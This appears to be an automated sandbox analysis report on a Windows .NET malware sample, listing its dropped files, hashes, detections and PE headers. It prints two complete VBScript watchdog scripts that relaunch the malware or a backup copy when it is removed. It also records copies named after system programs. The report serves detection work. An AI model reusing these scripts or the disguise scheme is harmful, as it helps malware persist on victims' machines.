Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\Downloads\ShellExperienceHost.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Downloads\ShellExperienceHost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\Downloads\f8c8f1285d826b

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with very long lines (744), with no line terminators
Category:	dropped
Size (bytes):	744
Entropy (8bit):	5.89475726214379
Encrypted:	false
SSDEEP:	12:KCVuc7wgUuIgYyR3y0tQaQz2DV1iDFILebzl5MaNz8Huu7tz2WAuIrVgRrL4MaIc:5uc7wRuIgYyR3yFrO2ILekIz8HftzvAN
MD5:	6EEF1A9ED4A08FAC1D1B5CBE34926E07
SHA1:	09509FAB7ECF320AA0203A448B62CAF38CEB6715
SHA-256:	22966B3888049F6B4D81939EAC5F3DC28D42E6C949165A7D6A70B35FB58F4476
SHA-512:	7759B01AAE24F0CA5D92C38863E7C5190E7F4718792855EF75924A770C60592AD29B81830DFFF297E5FD8BA93F377DFCF5F82AF252B45595F18864FC65DA305F
Malicious:	false
Preview:	ZO8DGumCLLLVbVKprq5ioBbuGCCNFMYajf2L5f2tV0KEkJ88VFxQdnFYxO7ErZ78xvv5d8uMyLMy0WJ6DE19YH66adYqhxC62LRyXCfXUkcRaQiaEABni8kpyzeAkDpAJQ5pFUjBieoxopfK47mgwYX4lmAihexR5bHJU3Vtb9EETwAITUFmbIOu2BDdUBdErX2NhWzBm3FwTTlyl1ONZKzwMXQTz2YagAW53xl7eE9iDbaiZP1dwPpghGAKFfMueoQT6q5xPRsVKRsu6s4kA5nQV0Xxwb291PDZLHmtTDNfhUVPXPOXlmtiA98GSHByYtd5OTjzFKQ6sItAeIZgNfXPfeYMIfbLCYGx0aBEqYRbVx02P7lKsel3VOZt4WqjtE4TB5KEGU0yN63sof6K4QdiwNcmBSKUsrrR2g1TxhDYnxpZVqEYZfpclVhydhDyKgFgOlzHomXXNE48hCRUNv4MCPqh9C0QdPOHsJKt06txIRPgbiQaQskYm3e95SImwG370wQY2ieQBGEu9JFawZAvozfzoKxhyHABYRpoR2irNUWfzu9wMrzXGHSBRbtru7c4GCVsebJ30SiUd994LBUGRn4Q8oWzI06Q2bZwYRRvi6gyj8hRbzgtmVmcHEtzETv9VRbBkNg3tihVHGrAHFYTUNngz6pTicrPKgdRgfrOSmADxRUBXss94bpHo5MnhMVQ1RLlmadlXJAsMksilo5ztrUs1VnlTDqFQtLf

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4KjLUaW30K.exe.log

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
MD5:	FE86BB9E3E84E6086797C4D5A9C909F2
SHA1:	14605A3EA146BAB4EE536375A445B0214CD40A97
SHA-256:	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
SHA-512:	07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ShellExperienceHost.exe.log

Download File

Process:	C:\Users\Public\Downloads\ShellExperienceHost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Download File

Process:	C:\Recovery\System.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\audiodg.exe.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

Download File

Process:	C:\Program Files (x86)\Windows Defender\dllhost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mnUYCZffXdEgQlZPiczLektp.exe.log

Download File

Process:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1588
Entropy (8bit):	5.361611429115807
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpv:iq+wmj0qCYqGSI6oPtzHeqKktJtpv
MD5:	3B4F1B7283C5F068FAC503E2C467404B
SHA1:	5BFDBDF8944BCDE1734AC03BD3B7C979D7C77F9F
SHA-256:	148AAAA94B0EF24D89808623C71D41B59EF222BDA6758AE53209A7DD39FCA986
SHA-512:	81A400D98EF649722FD8EED0AEA4506D652C60094D9F15E10928AFC9BFBB3519E097A3F432A8B680FDF815AB99318C3D7D856E567CAFDBE27AC206420358490F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs

Download File

Process:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	515
Entropy (8bit):	5.42375660423103
Encrypted:	false
SSDEEP:	12:9vWdDIyRfhMAyjMpL63PsVebuxo0BMhFiXAp4QCk3:9A3fCAyjl3EVencMDYAp4QCw
MD5:	513B729ED9B3098066BEC62BF3EA5C8B
SHA1:	B9D8F9E12AFCF4BF2278A06B32BFD3A3D1438334
SHA-256:	2F9E5DBE52125DB224107D6FF2B40E117EA903695E3815FCE3592EC07FC01D67
SHA-512:	BF73C9A7D07F0479C2ABADAFA5D53FBCD52938E67E1EE4052A4AEFD101A096D1ABC245C32C87DBD56606035D6B64FF47E925312D63A6C8A0221685AA16D5FEEF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs

Download File

Process:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	738
Entropy (8bit):	5.300447781333968
Encrypted:	false
SSDEEP:	12:9vWdTzyMsRfhMA6KiHFjMpL630ouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATkFjl3TpD/AEmHob/uhEjdxt
MD5:	3F2D4F8C8A838DA115610A401667259D
SHA1:	04E12F300732BCCB83844060ED10CD0C6AA43CF9
SHA-256:	C4CABBB5FF61DA16E8D6CB0627CC1EE23053C27EE480116B1300DE84F75BD667
SHA-512:	CECC97C01679269A803593A40A118262C715FE318954F45CFD7FA7F7B91B9891C55133DDDC51893B9C2E0DB8389B5999D42F3CF8C4A0DF0DE33D65814F480767
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "7304"..mainFilePath = "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe

Download File

Process:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe:Zone.Identifier

Download File

Process:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.155494594590181
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	4KjLUaW30K.exe
File size:	1'444'352 bytes
MD5:	181d043c0617914801548f09d5b776d4
SHA1:	757f042065a3dc2c9f73e635b41f83591c8ad647
SHA256:	501aa5f94b15b8716ef7f76e2dbdc146b436cd9e72274d6ec5dec7265706c0ad
SHA512:	c56897c04b11db7c09ef21be8fe6a541c3c9ffb428b3e1340fce5b035f9f74bb133b57e7cc0852730efd20b4a49da0e8a79b6390f105d18f9fb39461559be574
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
TLSH:	14657C017E44CE15F0192233C2EF494887B19D556AA7E32B7DBA37AE25163A33C1D9CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb.....................6........... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x55eeae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15ee60	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x164000	0x218	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x166000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x15ceb4	0x15d000	ac38d05b619d376dd0b3ce6bdc38ffee	False	0.7125282615508596	data	7.185003266418592	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x160000	0x2fdf	0x3000	21303765ce3da8b8821f4c1b2dbb35aa	False	0.310302734375	data	3.24250143937522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
